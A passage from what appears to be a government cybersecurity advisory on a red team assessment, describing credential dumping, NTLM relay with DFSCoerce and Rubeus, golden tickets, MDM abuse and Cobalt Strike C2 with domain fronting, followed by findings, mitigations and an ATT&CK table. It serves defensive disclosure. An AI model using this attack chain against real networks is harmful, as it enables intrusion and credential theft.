The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server and had SYSTEM level access to the Site 1 SharePoint server, which had Unconstrained Delegation enabled. They used this access to obtain the cached credentials of all logged-in users—including the New Technology Local Area Network Manager (NTLM) hash for the SharePoint server account. To obtain the credentials, the team took a snapshot of lsass.exe [T1003.001] with a tool called nanodump, exported the output, and processed the output offline with Mimikatz.

The team then exploited the Unconstrained Delegation misconfiguration to steal the DC’s TGT. They ran the DFSCoerce python script (DFSCoerce.py), which prompted DC authentication to the SharePoint server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT [T1550.002], [T1557.001]. (DFSCoerce abuses Microsoft’s Distributed File System [MS-DFSNM] protocol to relay authentication against an arbitrary server.[1])

The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1). The team used the krbtgt account hash throughout the rest of their assessment to perform golden ticket attacks [T1558.001] in which they forged legitimate TGTs. The team also used the asktgt command to impersonate accounts they had credentials for by requesting account TGTs [T1550.003].

The team first impersonated the SCCM Account 1 and moved laterally to a Site 1 SCCM distribution point (DP) server (SCCM Server 1) that had direct network access to Workstation 2. The team then moved from SCCM Server 1 to a central SCCM server (SCCM Server 2) at a third site (Site 3). Specifically, the team:

  1. Queried the AD using Lightweight Directory Access Protocol (LDAP) for information about the network’s sites and subnets [T1016]. This query revealed all organization sites and subnets broken down by classless inter-domain routing (CIDR) subnet and description.
  2. Used LDAP queries and domain name system (DNS) requests to identify recently active hosts.
  3. Listed existing network connections [T1049] on SCCM Server 1, which revealed an active Server Message Block (SMB) connection from SCCM Server 2.
  4. Attempted to move laterally to the SCCM Server 2 via AppDomain hijacking, but the HTTPS beacon failed to call back.
  5. Attempted to move laterally with an SMB beacon [T1021.002], which was successful.

The team also moved from SCCM Server 1 to a Site 1 workstation (Workstation 3) that housed an active server administrator. The team impersonated an administrative service account via a golden ticket attack (from SCCM Server 1); the account had administrative privileges on Workstation 3. The user employed a KeePass password manager that the team was able to use to obtain passwords for other internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database with credentials. The server administrator relied on a password manager, which stored credentials in a database file. The red team pulled the decryption key from memory using KeeThief and used it to unlock the database [T1555.005].

At the organization’s request, the red team confirmed that SCCM Server 2 provided access to the organization’s sites because firewall rules allowed SMB traffic to SCCM servers at all other sites.

The team moved laterally from SCCM Server 2 to an SCCM DP server at Site 5 and from the SCCM Server 1 to hosts at two other sites (Sites 4 and 6). The team installed persistent beacons at each of these sites. Site 5 was broken into a private and a public subnet and only DCs were able to cross that boundary. To move between the subnets, the team moved through DCs. Specifically, the team moved from the Site 5 SCCM DP server to a public DC; and then they moved from the public DC to the private DC. The team was then able to move from the private DC to workstations in the private subnet.

The team leveraged access available from SCCM 2 to move around the organization’s network for post-exploitation activities (See Post-Exploitation Activity section).

See Figure 1 for a timeline of the red team’s initial access and lateral movement showing key access points.

Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement
Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement

While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). The team’s primary methods to move between sites were AppDomainManager hijacking and dynamic-link library (DLL) hijacking [T1574.001]. In some instances, they used Windows Management Instrumentation (WMI) Event Subscriptions [T1546.003].

The team impersonated several accounts to evade detection while moving. When possible, the team remotely enumerated the local administrators group on target hosts to find a valid user account. This technique relies on anonymous SMB pipe binds [T1071], which are disabled by default starting with Windows Server 2016. In other cases, the team attempted to determine valid accounts based on group name and purpose. If the team had previously acquired the credentials, they used asktgt to impersonate the account. If the team did not have the credentials, they used the golden ticket attack to forge the account.

Post-Exploitation Activity: Gaining Access to SBSs

With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. Trusted agents of the organization tasked the team with gaining access to two specialized servers (SBS 1 and SBS 2). The team achieved root access to three SBS-adjacent workstations but was unable to move laterally to the SBS servers:

  • Phase I ended before the team could implement a plan to move to SBS 1.
  • An MFA prompt blocked the team from moving to SBS 2, and Phase I ended before they could implement potential workarounds.

However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised.

Plan for Potential Access to SBS 1

Conducting open-source research [1591.001], the team identified that SBS 1 and 2 assets and associated management/upkeep staff were located at Sites 5 and 6, respectively. Adding previously collected AD data to this discovery, the team was able to identify a specific SBS 1 admin account. The team planned to use the organization’s mobile device management (MDM) software to move laterally to the SBS 1 administrator’s workstation and, from there, pivot to SBS 1 assets.

The team identified the organization’s MDM vendor using open-source and AD information [T1590.006] and moved laterally to an MDM distribution point server at Site 5 (MDM DP 1). This server contained backups of the MDM MySQL database on its D: drive in the Backup directory. The backups included the encryption key needed to decrypt any encrypted values, such as SSH passwords [T1552]. The database backup identified both the user of the SBS 1 administrator account (USER 2) and the user’s workstation (Workstation 4), which the MDM software remotely administered.

The team moved laterally to an MDM server (MDM 1) at Site 3, searched files on the server, and found plaintext credentials [T1552.001] to an application programming interface (API) user account stored in PowerShell scripts. The team attempted to leverage these credentials to browse to the web login page of the MDM vendor but were unable to do so because the website directed to an organization-controlled single-sign on (SSO) authentication page.

The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by:

  1. Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1.
  2. While in the MDM MySQL database,
    • Elevating the selected MDM user’s account privileges to administrator privileges, and
    • Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548].
  3. Creating a policy via the MDM API [T1106], which instructed Workstation 4 to download and execute a payload to give the team interactive access as root to the workstation.
  4. Verifying their interactive access.
  5. Resetting permissions back to their original state by removing the policy via the MDM API and removing Create Policy and Delete Policy and administrator permissions and from the MDM user’s account.

While interacting with Workstation 4, the team found an open SSH socket file and a corresponding netstat connection to a host that the team identified as a bastion host from architecture documentation found on Workstation 4. The team planned to move from Workstation 4 to the bastion host to SBS 1. Note: A SSH socket file allows a user to open multiple SSH sessions through a single, already authenticated SSH connection without additional authentication.

The team could not take advantage of the open SSH socket. Instead, they searched through SBS 1 architecture diagrams and documentation on Workstation 4. They found a security operations (SecOps) network diagram detailing the network boundaries between Site 5 SecOps on-premises systems, Site 5 non-SecOps on-premises systems, and Site 5 SecOps cloud infrastructure. The documentation listed the SecOps cloud infrastructure IP ranges [T1580]. These “trusted” IP addresses were a public /16 subnet; the team was able to request a public IP in that range from the same cloud provider, and Workstation 4 made successful outbound SSH connections to this cloud infrastructure. The team intended to use that connection to reverse tunnel traffic back to the workstation and then access the bastion host via the open SSH socket file. However, Phase 1 ended before they were able to implement this plan.

Attempts to Access SBS 2

Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2. The team queried the AD to identify the branch’s users and administrators. The team gathered a list of potential accounts, from which they identified administrators, such as SYSTEMS ADMIN or DATA SYSTEMS ADMINISTRATOR, with technical roles. Using their access to the MDM MySQL database, the team queried potential targets to (1) determine the target’s last contact time with the MDM and (2) ensure any policy targeting the target’s workstation would run relatively quickly [T1596.005]. Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6).

The Workstation 5 user had bash history files with what appeared to be SSH passwords mistyped into the bash prompt and saved in bash history [T1552.003]. The team then attempted to authenticate to SBS 2 using a similar tunnel setup as described in the Access to SBS 1 section above and the potential credentials from the user’s bash history file. However, this attempt was unsuccessful for unknown reasons.

On Workstation 6, the team found a .txt file containing plaintext credentials for the user. Using the pattern discovered in these credentials, the team was able to crack the user’s workstation account password [T1110.002]. The team also discovered potential passwords and SSH connection commands in the user’s bash history. Using a similar tunnel setup described above, the team attempted to log into SBS 2. However, a prompt for an MFA passcode blocked this attempt.

See figure 2 for a timeline of the team’s post exploitation activity that includes key points of access.

Figure 2: Red Team Cyber Threat Activity: Post Exploitation
Figure 2: Red Team Cyber Threat Activity: Post Exploitation
Command and Control

The team used third-party owned and operated infrastructure and services [T1583] throughout their assessment, including in certain cases for command and control (C2) [TA0011]. These included:

  • Cobalt Strike and Merlin payloads for C2 throughout the assessment. Note: Merlin is a post-exploit tool that leverages HTTP protocols for C2 traffic.
    • The team maintained multiple Cobalt Strike servers hosted by a cloud vendor. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data.
  • Two commercially available cloud-computing platforms.
    • The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team’s Cobalt Strike servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors used HTTPS reverse proxies to redirect C2 traffic between the target organization’s network and the Cobalt Strike team servers [T1071.002]. The team encrypted all data in transit [T1573] using encryption keys stored on team’s Cobalt Strike servers.
  • A cloud service to rapidly change the IP address of the team’s redirecting servers in the event of detection and eradication.
  • Content delivery network (CDN) services to further obfuscate some of the team’s C2 traffic.
    • This technique leverages CDNs associated with high-reputation domains so that the malicious traffic appears to be directed towards a reputation domain but is actually redirected to the red team-controlled Cobalt Strike servers.
    • The team used domain fronting [T1090.004] to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating. This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server.
Phase II: Red Team Measurable Events Activity

The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. See Table 1 for a description of the events, the expected network defender activity, and the organization’s actual response.

Measurable EventDescriptionMITRE ATT&CK Technique(s)Expected Detection PointsExpected Network Defender ReactionsReported Reactions
Internal Port ScanLaunch scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s).Network Service Discovery [T1046]Network Monitoring and Analysis ToolsIntrusion Detection or Prevention SystemsEndpoint Protection PlatformDetect target hosts and portsIdentify associated scanning processAnalyze scanning host once detectedDevelop response planNone
 Comprehensive Active Directory and Host EnumerationPerform AD enumeration by querying all domain objects from the DC; and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server).Domain Trust Discovery [T1482]Account Discovery: Domain Account [T1087.002]System Owner/User Discovery [T1033]Remote System Discovery [T1018]Network Monitoring and Analysis ToolsIntrusion Detection or Prevention SystemsEndpoint Protection PlatformDetect target hosts and portsIdentify associated scanning processAnalyze scanning host once detectedDevelop response planCollection process stopped before completion. Host isolated and sent for forensics.
Data Exfiltration—1 GB of DataSend a large amount (1 GB) of mock sensitive information to an external system over various protocols, including ICMP, DNS, FTP, and/or HTTP/S.Exfiltration Over Alternative Protocol [T1048]Network Monitoring and Analysis ToolsIntrusion Detection or Prevention SystemsEndpoint Protection PlatformDetect target hosts and portsIdentify associated scanning processAnalyze scanning host once detectedDevelop response planNone
Malicious Traffic Generation—Workstation to External HostEstablish a session that originates from a target Workstation system directly to an external host over a clear text protocol, such as HTTP.Application Layer Protocol [T1071]Intrusion Detection or Prevention SystemsEndpoint Protection PlatformWindows Event LogsDetect and Identify source IP and source process of enumerationAnalyze scanning host once detectedDevelop response planNone
Active Directory Account LockoutLock out several administrative AD accountsAccount Access Removal [T1531Windows Event LogsEnd User ReportingDetect and Identify source IP and source process of exfiltrationAnalyze host used for exfiltration once detectedDevelop response planNone
Local Admin User Account Creation (workstation)Create a local administrator account on a target workstation system.Create Account: Local Account [T1136.001]Account Manipulation [T1098]Intrusion Detection or Prevention SystemsEndpoint Protection PlatformWeb Proxy LogsDetect and identify source IP and source process of malicious trafficInvestigate destination IP addressTriage compromised hostDevelop response planNone
Local Admin User Account Creation (server)Create a local administrator account on a target server system.Create Account: Local Account [T1136.001]Account Manipulation [T1098]Windows Event LogsDetect account creationIdentify source of changeVerify change with system ownerDevelop response planNone
Active Directory Account CreationCreate AD accounts and add it to domain admins groupCreate Account: Domain Account [T1136.002]Account Manipulation [T1098]Windows Event LogsDetect account creationIdentify source of changeVerify change with system ownerDevelop response planNone
Workstation Admin Lateral Movement—Workstation to WorkstationUse a previously compromised workstation admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on several target Workstations. Valid Accounts: Domain Accounts [T1078.002]Remote Services: SMB/Windows Admin Shares, Sub-technique [T1021.002]Create or Modify System Process: Windows Service [T1543.003]Windows Event LogsDetect account compromiseAnalyze compromised hostDevelop response planNone
Domain Admin Lateral Movement—Workstation to Domain ControllerUse a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC.Valid Accounts: Domain Accounts [T1078.002]Remote Services: SMB/Windows Admin Shares, Sub-technique [T1021.002]Create or Modify System Process: Windows Service [T1543.003]Windows Event LogsDetect account compromiseTriage compromised hostDevelop response planNone
Malicious Traffic Generation—Domain Controller to External HostEstablish a session that originates from a target Domain Controller system directly to an external host over a clear text protocol, such as HTTP.Application Layer Protocol [T1071]Intrusion Detection or Prevention SystemsEndpoint Protection PlatformWeb Proxy LogsDetect and identify source IP and source process of malicious trafficInvestigate destination IP addressTriage compromised hostDevelop response planNone
Trigger Host-Based Protection—Domain ControllerUpload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.Ingress Tool Transfer [T1105]Endpoint Protection PlatformEndpoint Detection and ResponseDetect and identify source IP and source process of malicious trafficInvestigate destination IP addressTriage compromised hostDevelop response planMalicious file was removed by antivirus
Ransomware SimulationExecute simulated ransomware on multiple Workstation systems to simulate a ransomware attack.Note: This technique does NOT encrypt files on the target system.N/AEnd User ReportingInvestigate end user reported eventTriage compromised hostDevelop response PlanFour users reported event to defensive staff
Findings
Key Issues

The red team noted the following key issues relevant to the security of the organization’s network. These findings contributed to the team’s ability to gain persistent, undetected access across the organization’s sites. See the Mitigations section for recommendations on how to mitigate these issues.

  • Insufficient host and network monitoring. Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network. The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. Additionally, throughout Phase I, the team received no deconflictions or confirmation that the organization caught their activity. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection:
    • Phishing
    • Lateral movement reuse
    • Generation and use of the golden ticket
    • Anomalous LDAP traffic
    • Anomalous internal share enumeration
    • Unconstrained Delegation server compromise
    • DCSync
    • Anomalous account usage during lateral movement
    • Anomalous outbound network traffic
    • Anomalous outbound SSH connections to the team’s cloud servers from workstations
  • Lack of monitoring on endpoint management systems. The team used the organization’s MDM system to gain root access to machines across the organization’s network without being detected. Endpoint management systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
  • KRBTGT never changed. The Site 1 krbtgt account password had not been updated for over a decade. The krbtgt account is a domain default account that acts as a service account for the key distribution center (KDC) service used to encrypt and sign all Kerberos tickets for the domain. Compromise of the krbtgt account could provide adversaries with the ability to sign their own TGTs, facilitating domain access years after the date of compromise. The red team was able to use the krbtgt account to forge TGTs for multiple accounts throughout Phase I.
  • Excessive permissions to standard users. The team discovered several standard user accounts that have local administrator access to critical servers. This misconfiguration allowed the team to use the low-level access of a phished user to move laterally to an Unconstrained Delegation host and compromise the entire domain.
  • Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of all users that authenticate to that host, enabling actors to steal service tickets or compromise krbtgt accounts and perform golden ticket or “silver ticket” attacks. The team performed an NTLM-relay attack to obtain the DC’s TGT, followed by a golden ticket attack on a SharePoint server with Unconstrained Delegation to gain the ability to impersonate any Site 1 AD account.
  • Use of non-secure default configurations. The organization used default configurations for hosts with Windows Server 2012 R2. The default configuration allows unprivileged users to query group membership of local administrator groups. The red team used and identified several standard user accounts with administrative access from a Windows Server 2012 R2 SharePoint server.
Additional Issues

The team noted the following additional issues.

  • Ineffective separation of privileged accounts. Some workstations allowed unprivileged accounts to have local administrator access; for example, the red team discovered an ordinary user account in the local admin group for the SharePoint server. If a user with administrative access is compromised, an actor can access servers without needing to elevate privileges. Administrative and user accounts should be separated, and designated admin accounts should be exclusively used for admin purposes.
  • Lack of server egress control. Most servers, including domain controllers, allowed unrestricted egress traffic to the internet.
  • Inconsistent host configuration. The team observed inconsistencies on servers and workstations within the domain, including inconsistent membership in the local administrator group among different servers or workstations. For example, some workstations had “Server Admins” or “Domain Admins” as local administrators, and other workstations had neither.
  • Potentially unwanted programs. The team noticed potentially unusual software, including music software, installed on both workstations and servers. These extraneous software installations indicate inconsistent host configuration (see above) and increase the attack surfaces for malicious actors to gain initial access or escalate privileges once in the network.
  • Mandatory password changes enabled. During the assessment, the team keylogged a user during a mandatory password change and noticed that only the final character of their password was modified. This is potentially due to domain passwords being required to be changed every 60 days.
  • Smart card use was inconsistent across the domain. While the technology was deployed, it was not applied uniformly, and there was a significant portion of users without smartcard protections enabled. The team used these unprotected accounts throughout their assessment to move laterally through the domain and gain persistence.
Noted Strengths

The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions:

  • The organization conducts regular, proactive penetration tests and adversarial assessments and invests in hardening their network based on findings.
    • The team was unable to discover any easily exploitable services, ports, or web interfaces from more than three million external in-scope IPs. This forced the team to resort to phishing to gain initial access to the environment.
    • Service account passwords were strong. The team was unable to crack any of the hashes obtained from the 610 service accounts pulled. This is a critical strength because it slowed the team from moving around the network in the initial parts of the Phase I.
    • The team did not discover any useful credentials on open file shares or file servers. This slowed the progress of the team from moving around the network.
  • MFA was used for some SBSs. The team was blocked from moving to SBS 2 by an MFA prompt.
  • There were strong security controls and segmentation for SBS systems. Direct access to SBS were located in separate networks, and admins of SBS used workstations protected by local firewalls.

MITIGATIONS

CISA recommends organizations implement the recommendations in Table 2 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

IssueRecommendation
Insufficient host and network monitoringEstablish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior [CPG 3.1]. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques.Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report.From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts.Consider who is accessing what (what resource), from where (what internal host or external location), and when (what day and time the access occurs).Look for access behavior that deviates from expected or is indicative of AD abuse.Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PSExec, and WMI, which are often used by malicious actors. CISA recommends selecting one tool to administer the network, ensuring logging is turned on [CPG 3.1], and disabling the others.Consider using “honeypot” service principal names (SPNs) to detect attempts to crack account hashes [CPG 1.1].Conduct regular assessments to ensure processes and procedures are up to date and can be followed by security staff and end users.Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with Unconstrained Delegation enabled).Ensure all commercial tools deployed in your environment are regularly tuned to pick up on relevant activity in your environment.
Lack of monitoring on endpoint management systemsTreat endpoint management systems as HVAs with additional restrictions and monitoring because they provide elevated access to thousands of hosts.
KRBTGT never changedChange the krbtgt account password on a regular schedule such as every 6 to 12 months or if it becomes compromised. Note that this password change must be carefully performed to effectively change the credential without breaking AD functionality. The password must be changed twice to effectively invalidate the old credentials. However, the required waiting period between resets must be greater than the maximum lifetime period of Kerberos tickets, which is 10 hours by default. See Microsoft’s KRBTGT account maintenance considerations guidance for more information.
Excessive permissions to standard users and ineffective separation of privileged accountsImplement the principle of least privilege:Grant standard user rights for standard user tasks such as email, web browsing, and using line-of-business (LOB) applications.Periodically audit standard accounts and minimize where they have privileged access.Periodically Audit AD permissions to ensure users do not have excessive permissions and have not been added to admin groups.Evaluate which administrative groups should administer which servers/workstations. Ensure group members administrative accounts instead of standard accounts.Separate administrator accounts from user accounts [CPG 1.5]. Only allow designated admin accounts to be used for admin purposes. If an individual user needs administrative rights over their workstation, use a separate account that does not have administrative access to other hosts, such as servers.Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 3.4]. PAM solutions can also log and alert usage to detect any unusual activity and may have helped stop the red team from accessing resources with admin accounts. Note: password vaults associated with PAM solutions should be treated as HVAs with additional restrictions and monitoring (see below).Configure time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege, as well as the Zero Trust model. This is a process in which a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When individual users need the account, they submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.
Hosts with Unconstrained Delegation enabledRemove Unconstrained Delegation from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., constrained delegation) or explore whether systems can be retired or further isolated from the enterprise. CISA recommends Windows Server 2019 or greater.Consider disabling or limiting NTLM and WDigest Authentication if possible, including using their use as criteria for prioritizing updates to legacy systems or for segmenting the network. Instead use more modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption [CPG 3.4].If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks CPG 3.4]. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server Message Block signing for more information.
Use of non-secure default configurationsKeep systems and software up to date [CPG 5.1]. If updates cannot be uniformly installed, update insecure configurations to meet updated standards.
Lack of server egress controlConfigure internal firewalls and proxies to restrict internet traffic from hosts that do not require it. If a host requires specific outbound traffic, consider creating an allowlist policy of domains.
Large number of credentials in a shared vaultTreat password vaults as HVAs with additional restrictions and monitoring [CPG 3.4]:If on-premise, require MFA for admin and apply network segmentation [CPG 1.3]. Use solutions with end-to-end encryption where applicable [CPG 3.3].If cloud-based, evaluate the provider to ensure use of strong security controls such as MFA and end-to-end encryption [CPG 1.3, 3.3].
Inconsistent host configurationEstablish a baseline/gold-image for workstations and servers and deploy from that image [CPG 2.5]. Use standardized groups to administer hosts in the network.
Potentially unwanted programsImplement software allowlisting to ensure users can only install software from an approved list [CPG 2.1].Remove unnecessary, extraneous software from servers and workstations.
Mandatory password changes enabledConsider only requiring changes for memorized passwords in the event of compromise. Regular changing of memorized passwords can lead to predictable patterns, and both CISA and the National Institute of Standards and Technology (NIST) recommend against changing passwords on regular intervals.

Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture:

  • Provide users with regular training and exercises, specifically related to phishing emails [CPG 4.3]. Phishing accounts for majority of initial access intrusion events.
  • Enforce phishing-resistant MFA to the greatest extent possible [CPG 1.3].
  • Reduce the risk of credential compromise via the following:
    • Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM.
    • Implement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
    • Refrain from storing plaintext credentials in scripts [CPG 3.4]. The red team discovered a PowerShell script containing plaintext credentials that allowed them to escalate to admin.
  • Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.

As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that:

  • Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).
  • Upgrades applications and infrastructure to leverage modern identity management and network access practices.
  • Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks.
  • Invests in technology and personnel to achieve these goals.

CISA encourages organizational IT leadership to ask their executive leadership the question: Can the organization accept the business risk of NOT implementing critical security controls such as MFA? Risks of that nature should typically be acknowledged and prioritized at the most senior levels of an organization.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

See CISA’s RedEye tool on CISA’s GitHub page. RedEye is an interactive open-source analytic tool used to visualize and report red team command and control activities. See CISA’s RedEye tool overview video for more information.

REFERENCES
[1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 3 for all referenced red team tactics and techniques in this advisory. Note: activity was from Phase I unless noted.

 Reconnaissance 
Technique TitleIDUse
Gather Victim Identity Information: Email AddressesT1589.002 The team found employee email addresses via open-source research.
Gather Victim Identify Information: Employee Names T1589.003 The team identified employee names via open-source research that could be used to derive email addresses.
Gather Victim Network Information: Network Security AppliancesT1590.006The team identified the organization’s MDM vendor and leveraged that information to move laterally to SBS-connected assets.
Gather Victim Org InformationT1591The team conducted open-source research and identified an organizational branch that likely had access to an SBS asset.
Gather Victim Org Information: Determine Physical LocationsT1591.001The team conducted open-source research to identify the physical locations of upkeep/management staff of selected assets.
Search Open Technical Databases: Scan Databases T1596.005The team queried an MDM SQL database to identify target administrators who recently connected with the MDM.
 Resource Development 
Technique TitleIDUse
Acquire InfrastructureT1583The team used third-party owned and operated infrastructure throughout their assessment for C2.
Establish Accounts: Email AccountsT1585.002The team used commercially available email platforms for their spearphishing activity.
Obtain Capabilities: ToolT1588.002The team used the following tools:Cobalt Strike and Merlin payloads for C2.KeeThief to obtain a decryption key from a KeePass databaseRubeus and DFSCoerce in an NTLM relay attack
 Initial Access 
Technique TitleIDUse
Phishing: Spearphishing LinkT1566.002The team sent spearphishing emails with links to a red-team-controlled domain to gain access to the organization’s systems.
 Execution 
Technique TitleIDUse
Native APIT1106The team created a policy via the MDM API, which downloaded and executed a payload on a workstation.
User ExecutionT1204Users downloaded and executed the team’s initial access payloads after clicking buttons to trigger download and execution.
 Persistence 
Technique TitleIDUse 
Account ManipulationT1098The team elevated account privileges to administrator and modified the user’s account by adding Create Policy and Delete Policy permissions.During Phase II, the team created local admin accounts and an AD account; they added the created AD account to a domain admins group.
Create Account: Local AccountT1136.001During Phase II, the team created a local administrator account on a workstation and a server.
Create Account: Domain AccountT1136.002During Phase II, the team created an AD account.
Create or Modify System Process: Windows ServiceT1543.003During Phase II, the team leveraged compromised workstation and domain admin accounts to execute a payload via Windows Service Creation on target workstations and the DC.
Event Triggered Execution: Windows Management Instrumentation Event SubscriptionT1546.003The team used WMI Event Subscriptions to move laterally between sites.
Hijack Execution Flow: DLL Search Order HijackingT1574.001The team used DLL hijacking to move laterally between sites.
 Privilege Escalation 
Technique TitleIDUse
Abuse Elevation Control MechanismT1548The team elevated user account privileges to administrator by modifying the user’s account via adding Create Policy and Delete Policy permissions.
 Defense Evasion 
Technique TitleIDUse
Valid Accounts: Domain AccountsT1078.002During Phase II, the team compromised a domain admin account and used it to laterally to multiple workstations and the DC.
 Credential Access 
Technique TitleIDUse
OS Credential Dumping: LSASS MemoryT1003.001The team obtained the cached credentials from a SharePoint server account by taking a snapshot of lsass.exe with a tool called nanodump, exporting the output and processing the output offline with Mimikatz.
OS Credential Dumping: DCSyncT1003.006The team harvested AES-256 hashes via DCSync.
Brute Force: Password CrackingT1110.002The team cracked a user’s workstation account password after learning the user’s patterns from plaintext credentials.
Unsecured CredentialsT1552The team found backups of a MySQL database that contained the encryption key needed to decrypt SSH passwords.
Unsecured Credentials: Credentials in FilesT1552.001The team found plaintext credentials to an API user account stored in PowerShell scripts on an MDM server.
Unsecured Credentials: Bash HistoryT1552.003The team found bash history files on a Workstation 5, and the files appeared to be SSH passwords saved in bash history.
Credentials from Password Stores: Password ManagersT1555.005The team pulled credentials from a KeePass database. 
Adversary-in-the-middle: LLMNR/NBT-NS Poisoning and SMB RelayT1557.001The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Steal or Forge Kerberos Tickets: Golden TicketT1558.001The team used the acquired krbtgt account hash throughout their assessment to forge legitimate TGTs.
Steal or Forge Kerberos Tickets: KerberoastingT1558.003The team leveraged Rubeus and DFSCoerce in a NTLM relay attack to obtain the DC’s TGT from a host with Unconstrained Delegation enabled.
 Discovery 
Technique TitleIDUse
System Network Configuration DiscoveryT1016The team queried the AD for information about the network’s sites and subnets. 
Remote System DiscoveryT1018The team queried the AD, during phase I and II, for information about computers on the network. 
System Network Connections DiscoveryT1049The team listed existing network connections on SCCM Server 1 to reveal an active SMB connection with server 2.
Permission Groups Discovery: Domain GroupsT1069.002The team leveraged ldapsearch and dsquery to query and scrape active directory information. 
Account Discovery: Domain AccountT1087.002The team queried AD for AD users (during Phase I and II), including for members of a SharePoint admin group and several standard user accounts with administrative access.
Cloud Infrastructure DiscoveryT1580The team found SecOps network diagrams on a host detailing cloud infrastructure boundaries.
Domain Trust DiscoveryT1482During Phase II, the team enumerated trust relationships within the AD Forest.
Group Policy DiscoveryT1615The team scraped AD information, including GPOs.
Network Service DiscoveryT1046During Phase II, the team enumerated ports on target systems from a previously compromised workstation.
